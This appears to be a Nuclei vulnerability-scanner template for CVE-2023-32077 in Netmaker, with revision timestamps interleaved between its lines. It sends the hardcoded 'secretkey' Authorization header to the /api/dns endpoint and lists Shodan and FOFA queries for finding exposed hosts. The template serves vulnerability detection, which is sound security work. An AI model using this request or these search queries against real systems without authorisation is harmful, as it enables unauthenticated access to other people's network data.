2024-04-29 12:59:55 +00:00
id : CVE-2023-32077
2024-04-29 12:54:31 +00:00
2024-04-29 12:59:55 +00:00
info :
name : Netmaker - Hardcoded DNS Secret Key
author : iamnoooob,rootxharsh,pdresearch
severity : high
description : |
Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2023-32077
2024-05-31 19:23:20 +00:00
cwe-id : CWE-798,CWE-321
epss-score : 0.08146
epss-percentile : 0.94315
2024-04-29 12:59:55 +00:00
cpe : cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:*
metadata :
verified : true
max-request : 1
vendor : gravitl
product : netmaker
2024-06-07 10:04:29 +00:00
shodan-query :
- html:"netmaker"
- http.html:"netmaker"
2024-05-31 19:23:20 +00:00
fofa-query : body="netmaker"
2024-06-07 10:04:29 +00:00
tags : cve,cve2023,info-key,netmaker,exposure,gravitl
2024-04-29 12:54:31 +00:00
2024-04-29 12:59:55 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/api/dns"
2024-04-29 12:54:31 +00:00
2024-04-29 12:59:55 +00:00
headers :
Authorization : "x secretkey"
2024-04-29 12:54:31 +00:00
2024-04-29 12:59:55 +00:00
matchers :
- type : dsl
dsl :
- 'status_code == 200'
- 'contains(header, "application/json")'
2024-04-30 06:14:34 +00:00
- 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")'
2024-04-29 12:59:55 +00:00
condition : and
2024-06-01 06:53:00 +00:00
# digest: 490a00463044022022bb6a32bbe67ce63f09a569ea77dbc532a426bb9ee2a6e51aceb5faf05842a40220632654660f5d4f4a8430ed0af848009258f9b5297792356180d1c9f6dfca60d6:922c64590222798bb761d5b6d8e72950